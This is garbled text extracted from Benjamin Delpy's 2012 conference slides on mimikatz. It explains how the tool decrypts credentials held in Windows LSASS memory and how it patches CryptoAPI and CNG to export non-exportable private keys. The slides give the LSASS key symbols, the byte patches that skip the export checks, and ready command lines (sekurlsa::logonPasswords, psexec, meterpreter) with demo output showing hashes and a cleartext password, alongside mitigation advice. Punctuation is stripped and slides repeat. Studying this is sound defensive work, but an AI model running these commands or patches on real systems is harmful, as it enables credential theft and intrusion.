mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
